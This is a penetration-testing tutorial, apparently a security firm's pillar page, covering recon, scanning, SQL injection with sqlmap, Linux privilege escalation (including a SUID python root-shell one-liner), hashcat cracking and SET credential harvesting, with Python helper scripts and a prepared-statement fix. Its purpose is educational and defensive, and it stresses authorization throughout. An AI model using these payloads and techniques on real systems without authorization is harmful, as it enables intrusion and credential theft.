Your client calls at 11:00 PM. The site is down. A firewall alert just fired: SQL injection attempt from an external IP. You discover a contact form left unsanitized three years ago. The last backup is two months old. – If you work in a mid-sized Italian company, you don’t need to imagine this scene. We at Meteora Web see it every day. That’s why we wrote this guide: not a theoretical manual, but an operational path on how to test a system’s security before someone else does it for you – without asking permission.
This Pillar Page covers the entire penetration testing lifecycle: methodology, tools, advanced techniques, and the most underestimated part – writing the report. Each section gives you something you can use immediately. No academic preamble.
What Ethical Hacking Is and the Legal Framework in Italy
Ethical hacking is the authorized test of a system’s defenses. Without written authorization, it’s a crime (Article 615-ter of the Italian Penal Code – unauthorized access to a computer system). In Italy, the reference framework is Law 48/2008, which ratifies the Budapest Convention on Cybercrime. An ethical penetration test must have a clear scope: targets, timelines, exclusions, handling of sensitive data. At Meteora Web, we always sign a document specifying what can and cannot be tested, and define time windows – never a surprise.
Standard methodologies: PTES, OWASP Testing Guide, OSSTMM
The three main internationally recognized methodologies are:
- PTES (Penetration Testing Execution Standard): 7 phases – pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, reporting.
- OWASP Testing Guide (WSTG): focused on web applications, with test cases for each vulnerability class; it is broader than the OWASP Top 10, which is an awareness list rather than a test methodology.
- OSSTMM (Open Source Security Testing Methodology Manual): more oriented toward operational security and processes.
We use a hybrid: OWASP for web application testing, PTES for infrastructure. Each phase produces data that flows into the final report.
Immediate action: Draft a test authorization (rules of engagement) starting from a public template and adapt it to your reality; the PTES pre-engagement section and the OWASP Testing Guide describe what it must contain: targets, time windows, exclusions, handling of sensitive data. Never run a command without a signed document.
Kali Linux: Setting Up Your Penetration Testing Environment
Kali Linux is the Debian-based distribution most used for penetration testing. It includes over 600 pre-installed tools. Starting from scratch, the first step is installation: virtual (VirtualBox / VMware), bare-metal, or Live USB. For corporate network tests, we discourage Live USB due to limited write performance. A virtual machine with 4 GB RAM and 2 CPU cores is sufficient for most scenarios.
Essential post-installation commands
# Update the system
sudo apt update && sudo apt full-upgrade -y
# Install additional tools (if missing)
sudo apt install -y gobuster dirb seclists
# Verify core tool installation
which nmap sqlmap burpsuite hashcat
Workspace organization
Create a directory structure for each project:
mkdir -p ~/pentest/{recon,exploit,reports,loot}
This simple schema prevents losing results and makes report writing easier. We use it for every assessment.
Immediate action: Install Kali Linux in a virtual environment, run the update, and create the directory structure above. Then install seclists (contains wordlists for directory busting and password cracking).
Reconnaissance and OSINT: Gathering Information Without Leaving Traces
The reconnaissance phase is what separates a pentester from a script kiddie. It has two parts: passive collection (no packets sent to the target, only public sources) and active enumeration (packets sent to the target, in a controlled way and only inside the authorized window).
Passive OSINT: tools and techniques
- whois: domain information (registrant, nameservers, creation dates).
- theHarvester: extracts emails, subdomains, and public IPs from search engines, PGP key servers, LinkedIn.
- Shodan: search engine for connected devices (search port:22 country:IT for SSH services exposed in Italy).
- Google dorking: advanced operators like site:target.com filetype:pdf or intitle:"index of" / for directory listings.
# Example with theHarvester
theHarvester -d meteoraweb.com -l 500 -b google
Active enumeration: Nmap and masscan
Use Nmap for port scanning. Initial quick scan: nmap -sT -Pn -p1-10000 target (-sT is a full TCP connect scan and does not need root; -Pn skips host discovery, useful when ping is filtered). On large internal ranges masscan is much faster; in both cases stay inside the authorized scope:
sudo masscan 192.168.1.0/24 -p22,80,443,3306 --rate=1000
Important: aggressive scans on production servers can trigger SOC alarms or block services. Always ask for test windows.
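As an added example (not code from the original page), a small Python helper that turns nmap's grepable output (-oG) and masscan's stdout into one host/port table for the recon directory and the report, and flags ports masscan reported that nmap did not confirm open. The two sample outputs are constructed inline; the -oG field layout (port/state/proto/owner/service/rpc/version/) and the "Discovered open port" line are the tools' real formats.

```python
import re

# Constructed sample of `nmap -oG` output (not a real scan).
NMAP_GREPABLE = """# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx 1.24/, 3306/filtered/tcp//mysql///\tIgnored State: closed (9997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 443/open/tcp//https//Apache/\tIgnored State: closed (9999)
# Nmap done (constructed sample)
"""

# Constructed sample of what masscan prints to stdout.
MASSCAN_STDOUT = """Discovered open port 22/tcp on 192.168.1.10
Discovered open port 3306/tcp on 192.168.1.10
Discovered open port 443/tcp on 192.168.1.20
Discovered open port 22/tcp on 192.168.1.30
"""


def parse_nmap_grepable(text):
    """Return {host: [{port, proto, state, service, version}, ...]}.
    Each -oG 'Ports:' entry is port/state/proto/owner/service/rpc/version/."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = (entry.strip().split("/") + [""] * 8)[:8]
                hosts.setdefault(host, []).append({
                    "port": int(parts[0]),
                    "state": parts[1],
                    "proto": parts[2],
                    "service": parts[4],
                    "version": parts[6],
                })
    return hosts


MASSCAN_RE = re.compile(r"Discovered open port (\d+)/(\w+) on (\S+)")


def parse_masscan(text):
    """Return a set of (host, port, proto) that masscan reported open."""
    return {(m.group(3), int(m.group(1)), m.group(2))
            for m in MASSCAN_RE.finditer(text)}


def open_ports(nmap_hosts):
    """(host, port, proto) tuples nmap confirmed open."""
    return {(h, p["port"], p["proto"])
            for h, ports in nmap_hosts.items() for p in ports
            if p["state"] == "open"}


def unconfirmed(nmap_hosts, masscan_set):
    """Ports masscan saw but nmap did not confirm open: re-scan these
    (rate limiting, filtering, or a host missing from the nmap target list)."""
    return masscan_set - open_ports(nmap_hosts)


def report_rows(nmap_hosts):
    """Tab-separated rows for the methodology/appendix section of the report."""
    return [f"{h}\t{p['port']}/{p['proto']}\t{p['service']}\t{p['version']}"
            for h, ports in sorted(nmap_hosts.items())
            for p in ports if p["state"] == "open"]


if __name__ == "__main__":
    hosts = parse_nmap_grepable(NMAP_GREPABLE)
    print("\n".join(report_rows(hosts)))
    print("to re-check:", sorted(unconfirmed(hosts, parse_masscan(MASSCAN_STDOUT))))
```

Run it against your own files by replacing the two constants with the contents of ~/pentest/recon/nmap.gnmap and the masscan log; the diff is the list of ports to re-scan slowly before anything goes into the findings.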
Immediate action: Perform passive OSINT on a domain you own (e.g., your blog). Use theHarvester and shodan.io. Document everything: the data collected will be used in the report.
Vulnerability Scanning: Nmap, Nessus, and OpenVAS
Automated vulnerability scanning is a necessary step but never sufficient. No tool replaces manual analysis. We use Nmap with NSE scripts for known vulnerabilities and OpenVAS for broader scans.
NSE (Nmap Scripting Engine) scanning
# Scan for vulnerabilities on a web service (quote the pattern so the shell does not expand the *)
nmap --script "http-vuln*" -p80,443 target
Recommended scripts: http-sql-injection, http-stored-xss, ssl-enum-ciphers. Watch out for false positives: every alert must be manually verified.
OpenVAS: quick install and configuration
# On Kali, OpenVAS is pre-installed (gvm)
sudo gvm-setup
sudo gvm-start
# Access via browser at https://127.0.0.1:9392 with credentials created during setup
Run a “Full and Fast” scan, then export the report as PDF. False positives can be numerous: invest time in triage.
Immediate action: Set up OpenVAS on your Kali and launch a scan on a vulnerable virtual machine (e.g., Metasploitable 2). Compare results with an Nmap NSE scan. Learn to distinguish a false positive from a real vulnerability.
Web Application Pentesting: Burp Suite from Configuration to Exploit
Burp Suite Community Edition is the de facto standard for web application testing. The workflow: interception, traffic analysis, manual attack.
Proxy setup and HTTPS certificate
- Launch Burp Suite, go to Proxy > Options (Proxy settings in recent versions) and check that the listener is on 127.0.0.1:8080.
- Configure the browser (e.g., Firefox) to use proxy 127.0.0.1:8080 for both HTTP and HTTPS.
- With the proxy active, visit http://burpsuite, click "CA Certificate" and import it into Firefox under Certificates > Authorities, so HTTPS traffic can be intercepted without certificate warnings.
Note: do not use your main browser with the proxy active. Use an isolated browser or a separate virtual machine to avoid contaminating your sessions.
Manual SQL Injection and sqlmap
Identified a vulnerable parameter? Example in a login form: username=admin' OR '1'='1. But the real power is combining Burp Repeater with sqlmap.
# Copy HTTP request from Burp Repeater and save to request.txt
sqlmap -r request.txt --batch --level=3 --risk=2
sqlmap automates database, table, and data extraction. But beware: never run sqlmap on an unauthorized target, and raise --risk above 2 only with the client's consent, because risk level 3 adds OR-based payloads that can modify rows. It can corrupt data or crash the database.
Immediate action: Set up Burp Suite with Firefox on a virtual machine with OWASP WebGoat (a vulnerable app). Practice intercepting requests and modifying parameters. Then use sqlmap with the request file.
Privilege Escalation on Linux: From Initial Access to Root
Once you have initial access (e.g., a reverse shell on a web server), the goal is to escalate privileges. The main techniques:
- Kernel exploit: check with uname -a and search for exploits for that version (e.g., Dirty Pipe, CVE-2022-0847).
- SUID misconfiguration: find binaries with the suid bit using find / -perm -4000 -type f 2>/dev/null. A classic: nmap --interactive if nmap has suid (the interactive mode only exists in old releases, up to 5.21).
- Sudo rights: run sudo -l. Sometimes an unprivileged user can execute commands as root without a password.
- Cron jobs: look in /etc/crontab and /etc/cron.d for scripts writable by your user.
Practical example: if you find /usr/bin/python3 with suid, you can run:
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Immediate action: On a test Linux machine (e.g., Metasploitable 2 or a vulnerable Debian), gain a low-privilege shell (via SSH or reverse shell). Apply the checklist above and try to become root. Document every step: it will be the core of your report.
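As an added example (not code from the original page), two of the checklist items above implemented in Python: the SUID sweep that `find / -perm -4000 -type f` does, matched against a short list of binaries that are known to give a root shell, and a parser for /etc/crontab lines that reports jobs whose program file is writable by the current user. The known-dangerous list is an assumed, illustrative subset; the demo builds a constructed mini filesystem in a temporary directory rather than touching the real host.

```python
import os
import shutil
import stat
import tempfile

# Assumed, illustrative subset of SUID binaries that yield a root shell
# (GTFOBins-style); the real list is much longer.
DANGEROUS_SUID = {"python3", "bash", "find", "vim", "perl", "env", "nmap"}


def find_suid(root):
    """Equivalent of `find ROOT -perm -4000 -type f`: regular files that
    carry the setuid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries, like 2>/dev/null in the shell
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def dangerous_suid(paths):
    """SUID files whose name is in the known-escalation list."""
    return [p for p in paths if os.path.basename(p) in DANGEROUS_SUID]


def writable_cron_scripts(crontab_text):
    """Parse /etc/crontab-style lines (m h dom mon dow user command) and
    return programs we can write to: anything appended there runs as the
    job's user on the next tick."""
    found = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0] or len(fields) < 7:
            continue  # SHELL=/bin/sh style variables, or @reboot-style lines
        program = fields[6]
        if os.path.isabs(program) and os.access(program, os.W_OK):
            found.append(program)
    return found


def demo():
    """Constructed mini filesystem in a temp dir (not a real host): a SUID
    copy of python3, a normal binary and a world-writable cron script.
    Returns the findings as paths relative to the temp root."""
    base = tempfile.mkdtemp(prefix="privesc-demo-")
    try:
        bindir = os.path.join(base, "usr", "bin")
        os.makedirs(bindir)
        for name, mode in (("python3", 0o4755), ("ls", 0o755)):
            path = os.path.join(bindir, name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)  # 0o4755 sets the setuid bit
        script = os.path.join(base, "opt", "backup.sh")
        os.makedirs(os.path.dirname(script))
        with open(script, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(script, 0o777)
        crontab = (
            "# /etc/crontab (constructed)\n"
            "SHELL=/bin/sh\n"
            f"*/5 * * * * root {script}\n"
            "0 3 * * * root /usr/local/sbin/rotate-logs.sh\n"  # constructed path, does not exist
        )
        suid = find_suid(base)
        return {
            "suid": [os.path.relpath(p, base) for p in suid],
            "dangerous": [os.path.basename(p) for p in dangerous_suid(suid)],
            "writable_cron": [os.path.relpath(p, base)
                              for p in writable_cron_scripts(crontab)],
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

On a real target call find_suid("/") and feed writable_cron_scripts the contents of /etc/crontab and each file in /etc/cron.d; the output is a candidate list, and every hit still has to be confirmed by hand (a SUID python3 is only useful if you can actually execute it).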
Password Cracking: Hashcat, John the Ripper, and Rainbow Tables
After a hash dump (e.g., from SQL injection or /etc/shadow file), offline cracking is required. Never attempt brute force online: slow and noisy.
Identify the hash type
hashid hash.txt
hash-identifier
Example: $2y$10$... = bcrypt. $1$... = MD5 crypt.
Cracking with Hashcat
If you have an NVIDIA or AMD GPU, Hashcat is very fast. For Windows NTLM hashes:
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt -O
Attack mode: wordlist + rules is the most effective. Add -r /usr/share/hashcat/rules/best64.rule for standard mutations (-O enables the optimized kernels, at the cost of a lower maximum password length).
Rainbow tables: when they are useful
Rainbow tables are only useful for unsalted hashes (e.g., LM hash of Windows). For salted hashes (bcrypt, SHA256 with salt) they are useless. We recommend against using rainbow tables for web app tests: better invest in a good wordlist and custom rules.
Immediate action: Generate a SHA256 hash of a simple password (echo -n "password" | sha256sum). Put the hash in a file and try to crack it with Hashcat (-m 1400, raw SHA-256) using rockyou.txt. Learn to recognize different hash types.
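As an added example (not code from the original page), the three ideas of this section in a few lines of Python: a prefix/length heuristic in the spirit of hashid (an assumed subset of its rules, paired with the real hashcat -m modes), a handful of best64-style mutations applied to a wordlist, and the reason rainbow tables stop working once a salt is involved. The wordlist and the salt are constructed; hashcat does the same work on a GPU, this only shows the logic.

```python
import hashlib
import re

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["letmein", "summer", "password", "meteora", "qwerty"]


def identify_hash(h):
    """Guess (name, hashcat mode) from prefix or length. Assumed subset of
    what hashid knows; the -m numbers are hashcat's real modes."""
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return ("bcrypt", 3200)
    if h.startswith("$1$"):
        return ("md5crypt", 500)
    if h.startswith("$6$"):
        return ("sha512crypt", 1800)
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return ("MD5 or NTLM (32 hex, ambiguous: try -m 0 and -m 1000)", None)
    if re.fullmatch(r"[0-9a-f]{64}", h):
        return ("SHA-256", 1400)
    return ("unknown", None)


def mutations(word):
    """A few best64-style rules: identity, capitalise, upper, append suffix."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2024"):
        yield word + suffix
        yield word.capitalize() + suffix


def sha256_hex(s):
    return hashlib.sha256(s.encode()).hexdigest()


def build_table(words):
    """Precomputed hash -> plaintext, the idea behind a rainbow table (a real
    one trades storage for recomputation, but the limitation is the same):
    it only matches hashes computed exactly the way we precomputed them."""
    return {sha256_hex(c): c for w in words for c in mutations(w)}


def crack_with_table(target_hex, table):
    """Lookup is O(1), but only for unsalted hashes."""
    return table.get(target_hex)


def crack_salted(target_hex, salt, words):
    """With a salt every hash needs its own computation, so the table is
    useless; a wordlist + rules attack still works, which is what hashcat
    does with -a 0 -r best64.rule (assumed salt||password layout here)."""
    for w in words:
        for c in mutations(w):
            if sha256_hex(salt + c) == target_hex:
                return c
    return None


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print(identify_hash("$2y$10$abcdefghijklmnopqrstuu"))
    print(crack_with_table(sha256_hex("Summer123"), table))
    salted = sha256_hex("a9f3" + "Password!")
    print(crack_with_table(salted, table), crack_salted(salted, "a9f3", WORDLIST))
```

The salted lookup returning None while the wordlist attack still succeeds is exactly why the page recommends wordlists and rules over rainbow tables for web application hashes.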
Social Engineering: Phishing Kits and Defenses
The weakest link is not the server – it’s the person. A well-crafted phishing attack can bypass any firewall. For internal tests, social engineering is often the most revealing.
Creating a phishing campaign with SET (Social Engineering Toolkit)
sudo setoolkit
1) Social-Engineering Attacks
2) Web Site Attack Vectors
3) Credential Harvester Attack Method
4) Site Cloner
SET clones the target login page (e.g., Google Workspace) and serves it to harvest the credentials typed into it; delivering the link by email is a separate step (SET's mass mailer module or your own sending infrastructure). Success rate is high, but you must have explicit authorization and inform HR.
Defenses: MFA mandatory, email warning banners for external emails, regular training. We test client staff with simulated campaigns and then deliver awareness sessions.
Immediate action: If you have a test environment, install SET and try the credential harvester on a cloned site you own. Never use it against third parties without permission.
The Pentesting Report: How to Write a Professional Report
A penetration test without a report is worthless. The report is the document the client will use to justify security investments. It must be clear, concise, and prioritize actions.
Standard report structure
- Executive Summary: 1 page, non-technical language, describes overall risk (High/Medium/Low) and top 3 vulnerabilities.
- Methodology: tools used, dates, times, scope.
- Findings: each vulnerability with ID, severity (CVSSv3), description, proof of exploit (screenshot), impact, recommendation.
- Appendices: tool outputs, logs, copies of HTTP requests.
Example entry for a SQL injection
VULN-001: SQL Injection in 'id' parameter of /product.php page
Severity: Critical (CVSS 9.1)
Description: The id parameter is not sanitized. A UNION-based payload (id=1 UNION SELECT 1,2,3,4 to confirm the column count, then a SELECT on the users table) retrieves data from the users table.
Proof: [screenshot of sqlmap extracting password hashes]
Impact: Access to all database data, including users and credentials.
Recommendation: Use prepared statements (PDO or MySQLi).
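As an added example (not code from the original page), the finding above and the login bypass from the SQL injection section side by side with the recommended fix, in Python with sqlite3 so it runs without a database server: the vulnerable functions paste user input into the SQL text, the fixed ones validate the type and bind the value as a parameter, which is what PDO or MySQLi prepared statements do in PHP. The table contents and the bcrypt-looking hash are constructed.

```python
import sqlite3


def setup_db():
    """In-memory demo database with constructed rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhash');
        INSERT INTO products VALUES (1, 'widget', '9.90'), (2, 'gadget', '19.90');
    """)
    return conn


# Payloads from the page: the UNION extraction of VULN-001 and the login bypass.
UNION_PAYLOAD = "1 UNION SELECT id, username, password_hash FROM users"
BYPASS_PAYLOAD = "admin' OR '1'='1"


# --- Vulnerable: user input becomes part of the SQL text --------------------

def product_vulnerable(conn, product_id):
    """/product.php?id=... as the page describes it: id is concatenated."""
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchall()


def login_vulnerable(conn, username, password_hash):
    """AND binds tighter than OR, so admin' OR '1'='1 makes the WHERE clause
    true for the admin row whatever the password is."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    return conn.execute(sql).fetchone() is not None


# --- Fixed: values are bound as parameters, never parsed as SQL --------------

def product_fixed(conn, product_id):
    pid = int(product_id)  # ValueError on anything that is not an integer
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (pid,)).fetchall()


def product_fixed_rejects(conn, product_id):
    """True when the fixed version refuses the input instead of running it."""
    try:
        product_fixed(conn, product_id)
    except ValueError:
        return True
    return False


def login_fixed(conn, username, password_hash):
    """Comparing the hash inside the query is a simplification for the demo;
    real code fetches the stored hash and verifies it with bcrypt."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash)).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable UNION:", product_vulnerable(conn, UNION_PAYLOAD))
    print("vulnerable bypass:", login_vulnerable(conn, BYPASS_PAYLOAD, "wrong"))
    print("fixed rejects UNION:", product_fixed_rejects(conn, UNION_PAYLOAD))
    print("fixed bypass:", login_fixed(conn, BYPASS_PAYLOAD, "wrong"))
```

The UNION row containing the admin hash is what the "Proof" screenshot in VULN-001 shows; the fixed version never gets that far because the parameter is either rejected as a non-integer or compared as a plain value.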
Immediate action: Prepare a report template in Markdown with the structure above. Every time you find a vulnerability, fill in the sheet immediately. Do not postpone documentation until the end of the test.
In Summary – What to Do Now
Ethical hacking is not a course to take; it’s a skill built by testing. Here are the concrete steps you can take today:
- Read the authorization document – without a signature, no test.
- Install Kali Linux in a VM and set up the environment as described.
- Perform passive OSINT on a domain you own.
- Run NSE and OpenVAS scans on a vulnerable machine (Metasploitable 2).
- Intercept an HTTP request with Burp Suite and try a manual SQL injection on WebGoat.
- Get a low-privilege shell (via exploit or SSH) and attempt privilege escalation.
- Write a report for every test you do, even if just for yourself.
We at Meteora Web do this every day. We come from accounting and code: every vulnerability found is a cost avoided. Security is not an expense; it’s an investment measured in operational continuity. To go deeper, check our article on Claude jailbreak to see how AI can be used in social engineering attacks. To defend hybrid infrastructures, read our guide on AI agents for protecting EV chargers.